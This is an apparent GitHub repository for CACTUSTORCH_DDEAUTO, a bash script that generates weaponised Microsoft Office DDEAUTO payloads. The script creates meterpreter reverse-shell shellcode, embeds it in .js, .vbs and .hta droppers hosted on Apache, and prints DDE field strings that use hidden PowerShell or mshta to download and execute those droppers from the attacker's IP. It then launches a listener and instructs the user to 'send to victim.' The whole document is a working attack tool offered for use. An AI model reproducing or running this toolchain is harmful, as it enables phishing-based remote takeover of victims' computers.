├── README.md
└── cactus.sh


/README.md:
--------------------------------------------------------------------------------
 1 | ## Account moved to: https://gitlab.com/illwill 
 2 | 
 3 |  
 4 | 
 5 | # CACTUSTORCH_DDEAUTO
 6 | OFFICE DDEAUTO Payload Generation script to automatically create a .vbs/.hta/.js payload for use inside a Microsoft Office document.
 7 | Will create the DDEAUTO function to download and execute your payload using powershell or mshta that you can paste inside a Word document.
 8 | That function can also be copy and pasted from Word to trigger in  One Note/Outlook email/Outlook Calendar/Outlook Task.
 9 | More info @ http://willgenovese.com/office-ddeauto-attacks/
10 | 
11 | Example:
12 | ![DEMO](https://i.imgur.com/GUQgzYk.png)
13 | 


--------------------------------------------------------------------------------
/cactus.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | internal="$(ip route get 8.8.8.8 | awk '{print $NF;exit}')"
  4 | external="$(dig +short myip.opendns.com @resolver1.opendns.com)"
  5 | 
  6 | echo -e "\e[93m   ___   _   ___ _____ _   _ ___ _____ ___  ___  ___ _  _ "
  7 | echo -e "\e[93m  / __| /_\ / __|_   _| | | / __|_   _/ _ \| _ \/ __| || |"
  8 | echo -e "\e[33m | (__ / _ \ (__  | | | |_| \__ \ | || (_) |   / (__| __ |"
  9 | echo -e "\e[91m  \___/_/ \_\___| |_|  \___/|___/ |_| \___/|_|_\\\\\___|_||_|"
 10 | echo -e "\e[96m            |   \|   \| __| /_\| | | |_   _/ _ \          "
 11 | echo -e "            | |) | |) | _| / _ \ |_| | | || (_) |         "
 12 | echo -e "            |___/|___/|___/_/ \_\___/  |_| \___/ "
 13 | echo -e "\t\e[1;93m-= OFFICE DDEAUTO Payload Generation script =-"
 14 | echo -e "\t\t\033[1;32mScript Author: illwill (@xillwillx)"
 15 | echo -e "\t\033[1;32m  CACTUSTORCH Author: Vincent Yiu (@vysecurity)"
 16 | echo ""
 17 | 
 18 | echo -e "\e[93mWhich IP you want to use?\e[0m"
 19 | options=(
 20 |     "Internal IP: $internal"
 21 |     "External IP: $external"
 22 |     "Manual IP"
 23 |     )
 24 | select option in "${options[@]}"
 25 | do
 26 |     case "$REPLY" in
 27 |         1) echo -e "\e[32m[+]\e[0m Internal IP: $internal was selected."
 28 |            ip=$internal
 29 | 			break ;;
 30 |         2) echo -e "\e[32m[+]\e[0m External IP: $external was selected." 
 31 |            ip=$external
 32 | 			break ;;
 33 |         3) echo -e "Enter the IP Manually."
 34 |            read input;
 35 |            ip=$input
 36 |            echo  -e "\e[32m[+]\e[0mManual IP: $ip was selected.\033[0;0m"
 37 | 			break ;;
 38 |         *) echo "Please select a valid option" ;;
 39 |     esac
 40 | done
 41 | 
 42 | echo ""
 43 | echo -e "\e[93mWhich PORT you want to use?\033[0;0m"
 44 | options=(
 45 |     "4444 (default)"
 46 |     "Manual Port"
 47 |     )
 48 | select option in "${options[@]}"
 49 | do
 50 |     case "$REPLY" in
 51 |         1) echo "Default: 4444"
 52 | 		   port='4444'
 53 | 		   echo -e "\e[32m[+]\e[0mDefault port: $port was entered."
 54 | 			break ;;
 55 |         2) echo "Enter the port Manually."
 56 |            read input;
 57 |            port=$input
 58 |            echo -e "\e[32m[+]\e[0mManual port: $port was entered."
 59 | 			break ;;
 60 |         *) echo "Please select a valid option" ;;
 61 |     esac
 62 | done
 63 | 
 64 | echo ""
 65 | echo -e "\e[32m[?]\e[0mChecking for CACTUSTORCH folder in current directory"
 66 | if [ -d "CACTUSTORCH" ] ; then
 67 | echo -e "\e[32m[+]\e[0mCACTUSTORCH folder found."
 68 | cd CACTUSTORCH
 69 | else
 70 | echo -e "\e[96m[+]\e[0mCACTUSTORCH folder not found, git'ing it"
 71 | git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
 72 | fi
 73 | 
 74 | echo ""
 75 | echo -e "\e[93mWhich payload you want to use?\033[0;0m"
 76 | options=(
 77 |     "windows/meterpreter/reverse_http"
 78 |     "windows/meterpreter/reverse_https"
 79 |     "windows/meterpreter/reverse_tcp"
 80 |     )
 81 | select option in "${options[@]}"
 82 | do
 83 |     case "$REPLY" in
 84 |         1) payload="windows/meterpreter/reverse_http"
 85 | 		   echo -e "\e[32m[+]\e[0m$payload was selected."
 86 | 			break ;;
 87 |         2) payload="windows/meterpreter/reverse_https" 
 88 | 		   echo -e "\e[32m[+]\e[0m$payload was selected."
 89 | 			break ;;
 90 |         3) payload="windows/meterpreter/reverse_tcp"
 91 | 		   echo -e "\e[32m[+]\e[0m$payload was selected."
 92 | 			break ;;
 93 |         *) echo "Please select a valid option" ;;
 94 |     esac
 95 | done
 96 | 
 97 | echo ""
 98 | echo -e "\e[32m[+]\e[0mCreating meterpreter shellcode with msfvenom"
 99 | msfvenom -p $payload LHOST=$ip LPORT=$port -f raw -o payload.bin
100 | 
101 | 
102 | if [ -f "payload.bin" ] ; then
103 | 	echo -e "\e[32m[+]\e[0mpayload.bin created."
104 | else
105 | 	echo -e "\e[96m[-]\e[0mpayload.bin not found, exiting..."
106 | 	exit 1
107 | fi
108 | 
109 | 
110 | echo -e "\e[32m[+]\e[0mGenerating base64 of payload.bin and injecting into the CACTUSTORCH .vbs/.hta/.js files"
111 | PAYLOAD=$(cat payload.bin | base64 -w 0)
112 | sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
113 | sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
114 | sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
115 | echo -e "\e[32m[+]\e[0mFiles edited. copying them to www folder"
116 | cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
117 | echo -e "\e[32m[+]\e[0mStarting Apache..."
118 | 
119 | 
120 | read -r -p "Do You want to start Apache [y/N] " response
121 | case "$response" in
122 |     [yY][eE][sS]|[yY]) 
123 | 	echo -e "\e[32m[+]\e[0mStarting Apache..."
124 |         service apache2 start
125 |         ;;
126 |     *)
127 | 	echo -e "\e[96m[-]\e[0mSkipping Apache..."
128 |         ;;
129 | esac
130 | 
131 | 
132 | 
133 | 
134 | echo -e "\n\n\n\n\e[91mOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\n\e[93mJS PAYLOAD:\e[0m\n\
135 | DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$ip\/CACTUSTORCH.js\',\'index.js\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.js\" >payloads.txt
136 | echo -e "\n\e[93mVBS PAYLOAD:\e[0m\n\
137 | DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$ip\/CACTUSTORCH.vbs\',\'index.vbs\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.vbs\" >>payloads.txt
138 | echo -e "\n\e[93mHTA PAYLOAD:\e[0m\n\
139 | DDEAUTO C:\\\\\Programs\\\\\Microsoft\\\\\Office\\\\\MSword.exe\\\\\..\\\\\..\\\\\..\\\\\..\\\\\windows\\\\\system32\\\\\mshta.exe \"http://$ip/CACTUSTORCH.hta\"" >>payloads.txt
140 | clear 
141 | cat payloads.txt && rm payloads.txt
142 | echo ""
143 | read -r -p "Do You want to start meterpreter handler now? [y/N] " response
144 | case "$response" in
145 |     [yY][eE][sS]|[yY]) 
146 | 	echo -e "\e[32m[+]\e[0mStarting Meterpreter Handler..."
147 |         msfconsole -qx "use exploit/multi/handler;set payload '$payload';set LHOST '$ip';set LPORT '$port'; set ExitOnSession false; set EnableStageEncoding true; exploit -j -z"
148 |         ;;
149 |     *)
150 | 	echo -e "\e[96m[-]\e[0mSkipping meterpreter handler..."
151 |         ;;
152 | esac
153 | 


--------------------------------------------------------------------------------